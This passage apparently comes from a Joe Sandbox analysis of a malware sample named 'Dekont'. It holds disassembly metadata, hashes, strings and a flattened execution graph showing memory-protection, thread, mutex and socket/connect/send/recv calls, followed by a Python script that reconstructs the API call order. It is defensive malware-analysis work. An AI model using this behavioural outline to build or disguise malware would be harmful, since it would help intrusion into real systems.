                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: 98f025fc443ac71db041a1140c786ada3efa0f62445cdc90a6b14fd9cce8d7f0
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: 6781D170E052498EEF258E6CC8907FEBBF1BF59720F184599E8D1A7299C73C8841CB61
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: d4371fd65ebd13473dc1cdda1e1284c5b1015624f4508f876499345285a9b692
                                  • Instruction ID: 99fd33258557116b4976974613b0740e251cdef7b3f6b2b94a29128cd9eba149
                                  • Opcode Fuzzy Hash: d4371fd65ebd13473dc1cdda1e1284c5b1015624f4508f876499345285a9b692
                                  • Instruction Fuzzy Hash: 2E21957AA00119ABDB10EF79CC50AFE7BF8EF64640F540156E985E3204E734DA11CBA1
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 0104031E
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010402E7
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010402BD
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: 226eab3cb18efefe0a6653cdcc83e6049817e7b2f521ed16220caa922dd59015
                                  • Instruction ID: c5a514da8b8b8c0331622890672725566e7086ea8df7ba82d1c629149c9abce6
                                  • Opcode Fuzzy Hash: 226eab3cb18efefe0a6653cdcc83e6049817e7b2f521ed16220caa922dd59015
                                  • Instruction Fuzzy Hash: 0BE10F716047459FD721CF28C880B6ABBE0BF88724F244A6DF6A5DB2E1D774D848DB42
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 01047BAC
                                  • RTL: Resource at %p, xrefs: 01047B8E
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01047B7F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: 49e391ae14dbc5cbd3e8878d5b85cd3cd3478bee4e51684135d10239847f50af
                                  • Instruction ID: ff860ec136631bf57525f7accfd6eb966cb3a198666011c27567bcad3408dac0
                                  • Opcode Fuzzy Hash: 49e391ae14dbc5cbd3e8878d5b85cd3cd3478bee4e51684135d10239847f50af
                                  • Instruction Fuzzy Hash: 8A41E2753007029FE722DE29C840B6AB7E5EF98710F100A6DF9DA97280DB71E8058B92
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0104728C
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 010472C1
                                  • RTL: Resource at %p, xrefs: 010472A3
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01047294
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: 025b6794345670c0c14d07ad579c54952a4895e03a83ff687e6057bf8c713d9a
                                  • Instruction ID: 0f35da64c19c75264d37daec2a59f47dc2310f711ec9ac8a2bb63386c38c1ec9
                                  • Opcode Fuzzy Hash: 025b6794345670c0c14d07ad579c54952a4895e03a83ff687e6057bf8c713d9a
                                  • Instruction Fuzzy Hash: 3241DFB5700207ABD721DE29CD81BAAB7E5FB94710F100669F9D5AB280DB61E842CBD1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: 5698f82fc7a6631d9e083138f34589d72f1e7434ac9279dcf1138d0e3a8af6d8
                                  • Instruction ID: 392b12332d4934e00bae99b5f4b2facbb5ad2014ceae994ffd17de1014739d9b
                                  • Opcode Fuzzy Hash: 5698f82fc7a6631d9e083138f34589d72f1e7434ac9279dcf1138d0e3a8af6d8
                                  • Instruction Fuzzy Hash: 31318776A002299FDB60DE2CCD50BEEB7F8EF54650F854595E9C9E3140EB309A44CB60
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: d87e9b553b8fae7e2cb8fe09ae0871bb51bd8a9518c335e52a26c3695a97b3f6
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: 3491A271E0020A9BEF64DF6DC880ABFBBF5AF44320F54855AE9D5E72C8D73899408751
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 9c695f3933fa18280361752731f9fceff769b4b29b6ed9ff826c54f6def0ca59
                                  • Instruction ID: 428c26af882222f512695aeb5aecb06587b8734708f943944058e200d8771f89
                                  • Opcode Fuzzy Hash: 9c695f3933fa18280361752731f9fceff769b4b29b6ed9ff826c54f6def0ca59
                                  • Instruction Fuzzy Hash: 86812A71D002699BDB31CB94CC45BEEB7B8AF48710F0441EAAA49B7280D7759E84DFA0

                                  Execution Graph

                                  Execution Coverage:2.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:4.7%
                                  Total number of Nodes:444
                                  Total number of Limit Nodes:15
                                  execution_graph 13803 e7492f4 13804 e749349 13803->13804 13805 e74949f 13804->13805 13807 e7458f2 NtProtectVirtualMemory 13804->13807 13806 e7458f2 NtProtectVirtualMemory 13805->13806 13810 e7494c3 13805->13810 13806->13810 13808 e749480 13807->13808 13809 e7458f2 NtProtectVirtualMemory 13808->13809 13809->13805 13811 e749597 13810->13811 13812 e7458f2 NtProtectVirtualMemory 13810->13812 13813 e7458f2 NtProtectVirtualMemory 13811->13813 13816 e7495bf 13811->13816 13812->13811 13813->13816 13814 e7496e1 13815 e74c382 ObtainUserAgentString 13814->13815 13818 e7496e9 13815->13818 13817 e7496b9 13816->13817 13819 e7458f2 NtProtectVirtualMemory 13816->13819 13817->13814 13820 e7458f2 NtProtectVirtualMemory 13817->13820 13819->13817 13820->13814 13934 e7529f1 13935 e7529f7 13934->13935 13938 e747852 13935->13938 13937 e752a0f 13939 e7478e4 13938->13939 13940 e747865 13938->13940 13939->13937 13940->13939 13942 e747887 13940->13942 13944 e74787e 13940->13944 13941 e74d36f 13941->13937 13942->13939 13943 e74b662 6 API calls 13942->13943 13943->13939 13944->13941 13945 e74d0c2 6 API calls 13944->13945 13945->13941 13821 e7450f1 13822 e745109 13821->13822 13826 e7451d3 13821->13826 13823 e745012 6 API calls 13822->13823 13824 e745113 13823->13824 13825 e750f82 6 API calls 13824->13825 13824->13826 13825->13826 13946 e7465f1 13947 e746606 13946->13947 13948 e74660e 13946->13948 13949 e74b662 6 API calls 13947->13949 13949->13948 13954 e7529b3 13955 e7529bd 13954->13955 13958 e7476d2 13955->13958 13957 e7529e0 13959 e747704 13958->13959 13960 e7476f7 13958->13960 13962 e74772d 13959->13962 13964 e747737 13959->13964 13966 e7476ff 13959->13966 13961 e7450f2 6 API calls 13960->13961 13961->13966 13967 e74d2c2 13962->13967 13965 e750f82 6 API calls 13964->13965 13964->13966 13965->13966 13966->13957 13968 e74d2df 13967->13968 13969 e74d2cb 13967->13969 13968->13966 13969->13968 13970 e74d0c2 6 API calls 13969->13970 13970->13968 13489 e750232 
13490 e75025c 13489->13490 13492 e750334 13489->13492 13491 e750410 NtCreateFile 13490->13491 13490->13492 13491->13492 13879 e74b8be 13880 e74b8c3 13879->13880 13881 e74b9a6 13880->13881 13882 e74b995 ObtainUserAgentString 13880->13882 13882->13881 13971 e748fbf 13972 e749016 13971->13972 13975 e7490bb 13972->13975 13976 e7490f0 13972->13976 13977 e7458f2 NtProtectVirtualMemory 13972->13977 13973 e7490e8 13974 e74c382 ObtainUserAgentString 13973->13974 13974->13976 13975->13973 13978 e7458f2 NtProtectVirtualMemory 13975->13978 13977->13975 13978->13973 13883 e74d0b9 13884 e74d0ed 13883->13884 13886 e74d1f0 13883->13886 13885 e750f82 6 API calls 13884->13885 13884->13886 13885->13886 13767 e74f83a 13768 e74f841 13767->13768 13769 e750f82 6 API calls 13768->13769 13771 e74f8c5 13769->13771 13770 e74f906 13771->13770 13772 e750232 NtCreateFile 13771->13772 13772->13770 13827 e7490fb 13829 e749137 13827->13829 13828 e7492d5 13829->13828 13830 e7458f2 NtProtectVirtualMemory 13829->13830 13831 e74928a 13830->13831 13832 e7458f2 NtProtectVirtualMemory 13831->13832 13835 e7492a9 13832->13835 13833 e7492cd 13834 e74c382 ObtainUserAgentString 13833->13834 13834->13828 13835->13833 13836 e7458f2 NtProtectVirtualMemory 13835->13836 13836->13833 13899 e750f7a 13901 e750fb8 13899->13901 13900 e751022 13901->13900 13902 e74d5b2 socket 13901->13902 13904 e751081 13901->13904 13902->13904 13903 e751134 13903->13900 13905 e74d732 connect 13903->13905 13910 e7511b2 13903->13910 13904->13900 13904->13903 13906 e751117 getaddrinfo 13904->13906 13905->13910 13906->13903 13907 e74d6b2 send 13909 e751729 13907->13909 13908 e7517f4 setsockopt recv 13908->13900 13909->13900 13909->13908 13910->13900 13910->13907 13837 e74d2e4 13838 e74d36f 13837->13838 13839 e74d305 13837->13839 13839->13838 13841 e74d0c2 13839->13841 13842 e74d0cb 13841->13842 13844 e74d1f0 13841->13844 13843 e750f82 6 API calls 13842->13843 13842->13844 13843->13844 13844->13838 13911 e747b66 13913 e747b6a 13911->13913 
13912 e747cce 13913->13912 13914 e747cb5 CreateMutexExW 13913->13914 13914->13912 13845 e74ace2 13847 e74add9 13845->13847 13846 e74b022 13847->13846 13851 e74a352 13847->13851 13849 e74af0d 13849->13846 13860 e74a792 13849->13860 13853 e74a39e 13851->13853 13852 e74a58e 13852->13849 13853->13852 13854 e74a4ec 13853->13854 13856 e74a595 13853->13856 13855 e750232 NtCreateFile 13854->13855 13858 e74a4ff 13855->13858 13856->13852 13857 e750232 NtCreateFile 13856->13857 13857->13852 13858->13852 13859 e750232 NtCreateFile 13858->13859 13859->13852 13861 e74a7e0 13860->13861 13862 e750232 NtCreateFile 13861->13862 13864 e74a90c 13862->13864 13863 e74aaf3 13863->13849 13864->13863 13865 e74a352 NtCreateFile 13864->13865 13866 e74a602 NtCreateFile 13864->13866 13865->13864 13866->13864 13602 e751bac 13603 e751bb1 13602->13603 13636 e751bb6 13603->13636 13637 e747b72 13603->13637 13605 e751c2c 13606 e751c85 13605->13606 13608 e751c54 13605->13608 13609 e751c69 13605->13609 13605->13636 13607 e74fab2 NtProtectVirtualMemory 13606->13607 13610 e751c8d 13607->13610 13611 e74fab2 NtProtectVirtualMemory 13608->13611 13612 e751c80 13609->13612 13613 e751c6e 13609->13613 13673 e749102 13610->13673 13617 e751c5c 13611->13617 13612->13606 13615 e751c97 13612->13615 13614 e74fab2 NtProtectVirtualMemory 13613->13614 13618 e751c76 13614->13618 13619 e751c9c 13615->13619 13620 e751cbe 13615->13620 13659 e748ee2 13617->13659 13665 e748fc2 13618->13665 13641 e74fab2 13619->13641 13623 e751cc7 13620->13623 13624 e751cd9 13620->13624 13620->13636 13625 e74fab2 NtProtectVirtualMemory 13623->13625 13628 e74fab2 NtProtectVirtualMemory 13624->13628 13624->13636 13627 e751ccf 13625->13627 13683 e7492f2 13627->13683 13632 e751ce5 13628->13632 13701 e749712 13632->13701 13639 e747b93 13637->13639 13638 e747cce 13638->13605 13639->13638 13640 e747cb5 CreateMutexExW 13639->13640 13640->13638 13643 e74fadf 13641->13643 13642 e74febc 13651 e748de2 13642->13651 13643->13642 13713 e7458f2 13643->13713 
13645 e74fe5c 13646 e7458f2 NtProtectVirtualMemory 13645->13646 13647 e74fe7c 13646->13647 13648 e7458f2 NtProtectVirtualMemory 13647->13648 13649 e74fe9c 13648->13649 13650 e7458f2 NtProtectVirtualMemory 13649->13650 13650->13642 13653 e748df0 13651->13653 13652 e748ecd 13655 e745412 13652->13655 13653->13652 13736 e74c382 13653->13736 13657 e745440 13655->13657 13656 e745473 13656->13636 13657->13656 13658 e74544d CreateThread 13657->13658 13658->13636 13661 e748f06 13659->13661 13660 e748fa4 13660->13636 13661->13660 13662 e7458f2 NtProtectVirtualMemory 13661->13662 13663 e748f9c 13662->13663 13664 e74c382 ObtainUserAgentString 13663->13664 13664->13660 13666 e749016 13665->13666 13667 e7490bb 13666->13667 13670 e7490f0 13666->13670 13671 e7458f2 NtProtectVirtualMemory 13666->13671 13668 e7490e8 13667->13668 13672 e7458f2 NtProtectVirtualMemory 13667->13672 13669 e74c382 ObtainUserAgentString 13668->13669 13669->13670 13670->13636 13671->13667 13672->13668 13674 e749137 13673->13674 13675 e7492d5 13674->13675 13676 e7458f2 NtProtectVirtualMemory 13674->13676 13675->13636 13677 e74928a 13676->13677 13678 e7458f2 NtProtectVirtualMemory 13677->13678 13681 e7492a9 13678->13681 13679 e7492cd 13680 e74c382 ObtainUserAgentString 13679->13680 13680->13675 13681->13679 13682 e7458f2 NtProtectVirtualMemory 13681->13682 13682->13679 13685 e749349 13683->13685 13684 e74949f 13686 e7458f2 NtProtectVirtualMemory 13684->13686 13690 e7494c3 13684->13690 13685->13684 13687 e7458f2 NtProtectVirtualMemory 13685->13687 13686->13690 13688 e749480 13687->13688 13689 e7458f2 NtProtectVirtualMemory 13688->13689 13689->13684 13691 e749597 13690->13691 13692 e7458f2 NtProtectVirtualMemory 13690->13692 13693 e7458f2 NtProtectVirtualMemory 13691->13693 13696 e7495bf 13691->13696 13692->13691 13693->13696 13694 e7496e1 13695 e74c382 ObtainUserAgentString 13694->13695 13698 e7496e9 13695->13698 13697 e7496b9 13696->13697 13699 e7458f2 NtProtectVirtualMemory 13696->13699 13697->13694 13700 
e7458f2 NtProtectVirtualMemory 13697->13700 13698->13636 13699->13697 13700->13694 13702 e749767 13701->13702 13703 e7458f2 NtProtectVirtualMemory 13702->13703 13708 e749903 13702->13708 13704 e7498e3 13703->13704 13705 e7458f2 NtProtectVirtualMemory 13704->13705 13705->13708 13706 e7499b7 13707 e74c382 ObtainUserAgentString 13706->13707 13709 e7499bf 13707->13709 13710 e7458f2 NtProtectVirtualMemory 13708->13710 13711 e749992 13708->13711 13709->13636 13710->13711 13711->13706 13712 e7458f2 NtProtectVirtualMemory 13711->13712 13712->13706 13714 e745987 13713->13714 13717 e7459b2 13714->13717 13728 e746622 13714->13728 13716 e745c0c 13716->13645 13717->13716 13718 e745ba2 13717->13718 13720 e745ac5 13717->13720 13719 e751e12 NtProtectVirtualMemory 13718->13719 13727 e745b5b 13719->13727 13732 e751e12 13720->13732 13722 e751e12 NtProtectVirtualMemory 13722->13716 13723 e745ae3 13723->13716 13724 e745b3d 13723->13724 13725 e751e12 NtProtectVirtualMemory 13723->13725 13726 e751e12 NtProtectVirtualMemory 13724->13726 13725->13724 13726->13727 13727->13716 13727->13722 13729 e74667a 13728->13729 13730 e751e12 NtProtectVirtualMemory 13729->13730 13731 e74667e 13729->13731 13730->13729 13731->13717 13733 e750942 13732->13733 13734 e751e45 NtProtectVirtualMemory 13733->13734 13735 e751e70 13734->13735 13735->13723 13737 e74c3c7 13736->13737 13740 e74c232 13737->13740 13739 e74c438 13739->13652 13741 e74c25e 13740->13741 13744 e74b8c2 13741->13744 13743 e74c26b 13743->13739 13745 e74b934 13744->13745 13746 e74b9a6 13745->13746 13747 e74b995 ObtainUserAgentString 13745->13747 13746->13743 13747->13746 13773 e74642e 13774 e74645b 13773->13774 13782 e7464c9 13773->13782 13775 e750232 NtCreateFile 13774->13775 13774->13782 13777 e746496 13775->13777 13776 e7464c5 13779 e750232 NtCreateFile 13776->13779 13776->13782 13777->13776 13778 e746082 NtCreateFile 13777->13778 13780 e7464b6 13778->13780 13779->13782 13780->13776 13781 e745f52 NtCreateFile 13780->13781 13781->13776 13931 
e74d72e 13932 e74d788 connect 13931->13932 13933 e74d76a 13931->13933 13933->13932 13887 e752aa9 13888 e752aaf 13887->13888 13891 e74d212 13888->13891 13890 e752ac7 13892 e74d237 13891->13892 13893 e74d21b 13891->13893 13892->13890 13893->13892 13894 e74d0c2 6 API calls 13893->13894 13894->13892 13783 e74c22a 13784 e74c25e 13783->13784 13785 e74b8c2 ObtainUserAgentString 13784->13785 13786 e74c26b 13785->13786 13867 e74acd4 13869 e74acd8 13867->13869 13868 e74b022 13869->13868 13870 e74a352 NtCreateFile 13869->13870 13871 e74af0d 13870->13871 13871->13868 13872 e74a792 NtCreateFile 13871->13872 13872->13871 13493 e751e12 13497 e750942 13493->13497 13495 e751e45 NtProtectVirtualMemory 13496 e751e70 13495->13496 13498 e750967 13497->13498 13498->13495 13787 e746613 13789 e746620 13787->13789 13788 e74667e 13789->13788 13790 e751e12 NtProtectVirtualMemory 13789->13790 13790->13789 13520 e7452dd 13523 e74531a 13520->13523 13521 e7453fa 13522 e745328 SleepEx 13522->13522 13522->13523 13523->13521 13523->13522 13527 e74ff12 13523->13527 13536 e746432 13523->13536 13546 e7450f2 13523->13546 13528 e74ff48 13527->13528 13531 e7500e9 13528->13531 13534 e750134 13528->13534 13535 e750232 NtCreateFile 13528->13535 13552 e750f82 13528->13552 13529 e750125 13572 e74f922 13529->13572 13531->13529 13564 e74f842 13531->13564 13534->13523 13535->13528 13537 e74645b 13536->13537 13545 e7464c9 13536->13545 13538 e750232 NtCreateFile 13537->13538 13537->13545 13539 e746496 13538->13539 13544 e7464c5 13539->13544 13584 e746082 13539->13584 13541 e750232 NtCreateFile 13541->13545 13542 e7464b6 13542->13544 13593 e745f52 13542->13593 13544->13541 13544->13545 13545->13523 13547 e7451d3 13546->13547 13548 e745109 13546->13548 13547->13523 13598 e745012 13548->13598 13550 e745113 13550->13547 13551 e750f82 6 API calls 13550->13551 13551->13547 13553 e750fb8 13552->13553 13554 e74d5b2 socket 13553->13554 13556 e751081 13553->13556 13563 e751022 13553->13563 13554->13556 13555 e751134 13557 
e74d732 connect 13555->13557 13562 e7511b2 13555->13562 13555->13563 13556->13555 13558 e751117 getaddrinfo 13556->13558 13556->13563 13557->13562 13558->13555 13559 e74d6b2 send 13561 e751729 13559->13561 13560 e7517f4 setsockopt recv 13560->13563 13561->13560 13561->13563 13562->13559 13562->13563 13563->13528 13565 e74f86d 13564->13565 13580 e750232 13565->13580 13567 e74f906 13567->13531 13568 e74f888 13568->13567 13569 e74f8c5 13568->13569 13570 e750f82 6 API calls 13568->13570 13569->13567 13571 e750232 NtCreateFile 13569->13571 13570->13569 13571->13567 13573 e74f9c2 13572->13573 13574 e750232 NtCreateFile 13573->13574 13577 e74f9d6 13574->13577 13575 e74fa9f 13575->13534 13576 e74fa5d 13576->13575 13578 e750232 NtCreateFile 13576->13578 13577->13575 13577->13576 13579 e750f82 6 API calls 13577->13579 13578->13575 13579->13576 13581 e75025c 13580->13581 13583 e750334 13580->13583 13582 e750410 NtCreateFile 13581->13582 13581->13583 13582->13583 13583->13568 13585 e746420 13584->13585 13586 e7460aa 13584->13586 13585->13542 13586->13585 13587 e750232 NtCreateFile 13586->13587 13589 e7461f9 13587->13589 13588 e7463df 13588->13542 13589->13588 13590 e750232 NtCreateFile 13589->13590 13591 e7463c9 13590->13591 13592 e750232 NtCreateFile 13591->13592 13592->13588 13594 e745f84 13593->13594 13595 e745f70 13593->13595 13596 e750232 NtCreateFile 13594->13596 13595->13544 13597 e746046 13596->13597 13597->13544 13599 e745031 13598->13599 13600 e7450cd 13599->13600 13601 e750f82 6 API calls 13599->13601 13600->13550 13601->13600 13873 e748edd 13875 e748f06 13873->13875 13874 e748fa4 13875->13874 13876 e7458f2 NtProtectVirtualMemory 13875->13876 13877 e748f9c 13876->13877 13878 e74c382 ObtainUserAgentString 13877->13878 13878->13874 13791 e752a1f 13792 e752a25 13791->13792 13795 e7465f2 13792->13795 13794 e752a3d 13796 e74660e 13795->13796 13797 e7465fb 13795->13797 13796->13794 13797->13796 13798 e74b662 6 API calls 13797->13798 13798->13796 13950 e748dd9 13952 
e748df0 13950->13952 13951 e748ecd 13952->13951 13953 e74c382 ObtainUserAgentString 13952->13953 13953->13951 13499 e750f82 13500 e750fb8 13499->13500 13503 e751081 13500->13503 13510 e751022 13500->13510 13511 e74d5b2 13500->13511 13502 e751134 13509 e7511b2 13502->13509 13502->13510 13514 e74d732 13502->13514 13503->13502 13505 e751117 getaddrinfo 13503->13505 13503->13510 13505->13502 13507 e7517f4 setsockopt recv 13507->13510 13508 e751729 13508->13507 13508->13510 13509->13510 13517 e74d6b2 13509->13517 13512 e74d5ec 13511->13512 13513 e74d60a socket 13511->13513 13512->13513 13513->13503 13515 e74d788 connect 13514->13515 13516 e74d76a 13514->13516 13515->13509 13516->13515 13518 e74d705 send 13517->13518 13519 e74d6e7 13517->13519 13518->13508 13519->13518 13748 e752a4d 13749 e752a53 13748->13749 13752 e746782 13749->13752 13751 e752a6b 13753 e74678f 13752->13753 13754 e7467ad 13753->13754 13756 e74b662 13753->13756 13754->13751 13757 e74b66b 13756->13757 13762 e74b7ba 13756->13762 13758 e7450f2 6 API calls 13757->13758 13757->13762 13760 e74b6ee 13758->13760 13759 e74b750 13759->13762 13763 e74b83f 13759->13763 13765 e74b791 13759->13765 13760->13759 13761 e750f82 6 API calls 13760->13761 13761->13759 13762->13754 13763->13762 13764 e750f82 6 API calls 13763->13764 13764->13762 13765->13762 13766 e750f82 6 API calls 13765->13766 13766->13762 13915 e74a14a 13916 e74a153 13915->13916 13921 e74a174 13915->13921 13917 e74c382 ObtainUserAgentString 13916->13917 13919 e74a16c 13917->13919 13918 e74a1e7 13920 e7450f2 6 API calls 13919->13920 13920->13921 13921->13918 13923 e7451f2 13921->13923 13924 e74520f 13923->13924 13928 e7452c9 13923->13928 13925 e74ff12 7 API calls 13924->13925 13926 e745242 13924->13926 13925->13926 13927 e745289 13926->13927 13929 e746432 NtCreateFile 13926->13929 13927->13928 13930 e7450f2 6 API calls 13927->13930 13928->13921 13929->13927 13930->13928 13799 e751e0a 13800 e751e45 NtProtectVirtualMemory 13799->13800 13801 e750942 
13799->13801 13802 e751e70 13800->13802 13801->13800
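The execution_graph above is printed as one whitespace-separated run of node and edge tokens, which makes the order of API calls inside a single routine hard to read off. The following Python is an added editorial example, not code from Joe Sandbox or from the analysed sample: it parses that token stream under a grammar inferred from the dump (a node is an id, a hex address and an optional label; an edge is `id->id`) and then linearises the API call sites reachable from a chosen routine by graph reachability, so that a call site is placed before every call site it can reach. The two excerpts embedded as `SAMPLE_NET` and `SAMPLE_AGG` are copied verbatim from the dump above; the function names, the five-hex-digit address heuristic and the decision to treat an `N API calls` label as a collapsed callee rather than a call site are this example's own assumptions.

```python
"""Recover the API call order of one routine from the flattened
execution_graph dump that Joe Sandbox prints (see the graph above).

Token grammar, inferred from the dump on this page (assumption):
    <id> <hex address> [label ...]    defines a node, label optional
    <id>-><id>                        defines a directed edge
A label is an API name ("socket"), several names ("setsockopt recv"),
or an aggregate annotation for a collapsed callee ("6 API calls").
"""
import re
from collections import defaultdict

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]{5,}$")   # addresses in the dump are 7 hex digits

# Copied from the execution_graph dump above: the routine at e750f82 whose
# control-flow graph in the report holds the socket/connect/send/recv code.
SAMPLE_NET = (
    "13499 e750f82 13500 e750fb8 13499->13500 13503 e751081 13500->13503 "
    "13510 e751022 13500->13510 13511 e74d5b2 13500->13511 13502 e751134 "
    "13509 e7511b2 13502->13509 13502->13510 13514 e74d732 13502->13514 "
    "13503->13502 13505 e751117 getaddrinfo 13503->13505 13503->13510 "
    "13505->13502 13507 e7517f4 setsockopt recv 13507->13510 13508 e751729 "
    "13508->13507 13508->13510 13509->13510 13517 e74d6b2 13509->13517 "
    "13512 e74d5ec 13511->13512 13513 e74d60a socket 13511->13513 "
    "13512->13513 13513->13503 13515 e74d788 connect 13514->13515 "
    "13516 e74d76a 13514->13516 13515->13509 13516->13515 "
    "13518 e74d705 send 13517->13518 13519 e74d6e7 13517->13519 "
    "13518->13508 13519->13518"
)

# Also copied from the dump above: a collapsed callee annotated "6 API calls"
# and an edge whose source node (13940) is defined elsewhere in the dump.
SAMPLE_AGG = ("13942 e747887 13940->13942 13943 e74b662 6 API calls "
              "13942->13943 13943->13939")


def parse_graph(text):
    """Return (nodes, edges). nodes maps id -> (address, label); edges is a
    list of (src, dst). Ids that only appear in edges get a placeholder."""
    nodes, edges, current = {}, [], None
    tokens = text.split()          # newlines inside a token run are harmless
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            current = None         # labels never follow an edge in the dump
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = int(tok)
            nodes[current] = [tokens[i + 1], []]
            i += 2
        elif current is not None:  # "6" in "6 API calls" lands here, not above
            nodes[current][1].append(tok)
            i += 1
        else:
            raise ValueError(f"unexpected token {tok!r} at position {i}")
    for src, dst in edges:
        nodes.setdefault(src, ["?", []])
        nodes.setdefault(dst, ["?", []])
    return {n: (addr, " ".join(words)) for n, (addr, words) in nodes.items()}, edges


def api_nodes(nodes):
    """Ids whose label names one or more APIs. An 'N API calls' label is an
    aggregate for a collapsed callee, not a call site, so it is excluded."""
    return {n for n, (_, label) in nodes.items()
            if label and not label.endswith("API calls")}


def reachable(adj, start):
    """Ids reachable from start by following edges (start itself only if on a cycle)."""
    seen, stack = set(), [start]
    while stack:
        for m in adj[stack.pop()]:
            if m not in seen:
                seen.add(m)
                stack.append(m)
    return seen


def api_call_order(text, entry_address):
    """Linearise the API call sites reachable from the routine at entry_address.
    Site A is placed before B when B is reachable from A; mutually reachable
    sites (a retry loop) form one group. Returns a list of groups, each a
    list of (address, label)."""
    nodes, edges = parse_graph(text)
    adj = defaultdict(list)
    for src, dst in edges:
        adj[src].append(dst)
    entry = next((n for n, (addr, _) in nodes.items() if addr == entry_address), None)
    if entry is None:
        raise KeyError(f"no node with address {entry_address}")
    apis = api_nodes(nodes) & reachable(adj, entry)
    reach = {n: reachable(adj, n) & apis for n in apis}
    groups, placed = [], set()
    for n in sorted(apis, key=lambda n: (-len(reach[n]), n)):
        if n in placed:
            continue
        group = [m for m in sorted(apis) if m == n or (m in reach[n] and n in reach[m])]
        placed.update(group)
        groups.append([nodes[m] for m in group])
    return groups


if __name__ == "__main__":
    for group in api_call_order(SAMPLE_NET, "e750f82"):
        print(" | ".join(f"{addr} {label}" for addr, label in group))
```

For the routine at e750f82 the linearisation comes out as socket, getaddrinfo, connect, send, then the setsockopt/recv site, which is the resolve, connect, transmit and receive sequence of a client network transaction and is consistent with the network activity the report's signatures flag. Ordering by reachability rather than by a shortest path matters here: the edge 13500->13503 bypasses the socket node (the socket call is conditional), so a shortest path from the entry to the recv site would never pass through socket, getaddrinfo or connect.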

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
